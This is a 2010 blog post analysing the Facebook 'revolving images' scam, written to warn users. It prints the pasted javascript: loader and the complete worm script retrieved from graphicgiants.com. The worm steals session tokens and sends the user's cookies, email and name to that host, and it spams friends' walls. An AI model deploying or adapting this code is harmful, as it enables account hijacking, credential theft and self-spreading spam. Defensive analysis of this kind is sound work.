Javascript of Revolving Images Spam on Facebook

NOTE: All links written in this post are for informational purpose only. I will not be responsible for anything which happens to your Facebook account if you choose to click on any of the links. I would not suggest you to click on them at all unless and until you have completely safeguarded yourself. Please click on any of them at your own risk. All other information posted in this blog post is for informational purpose only. I will not be held responsible if anyone decides to use the code provided in the blog post to make any malicious scripts.

UPDATE1: You can report about the Link to facebook submitting the link and other details at http://www.facebook.com/help/contact.php?show_form=report_phishing

UPDATE2: Check out how to Remove the Scam from your affected profile and how to safeguard yourself  at How to safeguard against the Facebook Revolving Images Scam

Recently on Facebook many people have been tricked into unknowingly spamming a link called

http://bit.ly/91wrzd

http://bit.ly/faceb00ked

http://majicalimages.tk/

What this link basically claims to do it to get all the images on your page pop out and revolve. However behind the scenes it is solely intended at making you spam this link further to many more people by posting this message in your Wall:

Really cool Facebook revolving images. MUST SEE http://majicalimages.tk/

please DO NOT CLICK on the above links.

Now when you click on the link you will be taken to a page like this:

Now once you are on this page it will ask you to paste the JavaScript in your address bar on a Facebook page. Now as you can see the Javascript is basically:

javascript:(a = (b = document).createElement(“script”)).src = “//graphicgiants.com/majic.js?show”, b.body.appendChild(a); void(0)

Now the script basically attaches the script found at graphicgiants.com/majic.js?show to your current page which eventually makes the browser run that script.

So many people are unknowingly spamming this link to their wall post which in turn is tricking many more people into clicking it.

So I checked it out and what is happening it if you try to open the link graphicgiants.com/majic.js?show in the browser you can never check what JavaScript is running.  However I used the cURL script I wrote earlier in this post to access the link  and I got the whole script which is running in the background. The script is given below(I have indented it properly for clear comprehension):

txt = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";
alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";
with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {
if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0;
llimit = 20;
t = setInterval(function () {
if (i >= llimit) return;
if (i == 0) {
with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
if (xxx.readyState == 4 && xxx.status == 200) {
with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
document.body.appendChild(s);
}
}, send(null);
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
if (xxxx.readyState == 4 && xxxx.status == 200) {
with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
document.body.appendChild(s);
}
}, send(null);
}
if (i % 2 == 0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
} else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
i += 1;
}, 2000);
}
}, send(null);
}
}, send(null);

Now I have  highlighted the mail points in this script. Basically its preparing the two main messages to post in the first two lines. And following that its making a new XHR request (Ajax Request) to the scripts at majic.js and mmajaicc.js and passes your cookie values to it. Since you are on a facebook page so your cookie values related to the facebook.com domain are also passed to the script. Now once it gets the cookie its calling the facebook ajax/updatestatus.php with the details of the text it wants to post in your status.

So this is the way you are getting tricked into spreading this spam. So best way to counter this is NOT TO CLICK on any such links.

Also the script seems to have been made by the owners of this page: http://www.facebook.com/GraphicGiants so please go an Report Abuse this Page to stop this spamming. Please leave any comments if you know any more such links or any solution to this problem. I hope Facebook figures it out soon.

#Facebook #Spam #defamed Study the script running behind the the Facebook Revolving Images spam http://wp.me/pL5zK-28 Read it and be safe

— Shubhanshu Mishra (@TheShubhanshu) November 21, 2010

Happy Facebooking. Stay Safe.

UPDATE2: Check out how to Remove the Scam from your affected profile and how to safeguard yourself  at How to safeguard against the Facebook Revolving Images Scam

NOTE: All links written in this post are for informational purpose only. I will not be responsible for anything which happens to your Facebook account if you choose to click on any of the links. I would not suggest you to click on them at all unless and until you have completely safeguarded yourself. Please click on any of them at your own risk. All other information posted in this blog post is for informational purpose only. I will not be held responsible if anyone decides to use the code provided in the blog post to make any malicious scripts.

Read More posts related to Facebook

• Facebook revamps Messages: Its all about Conversation Now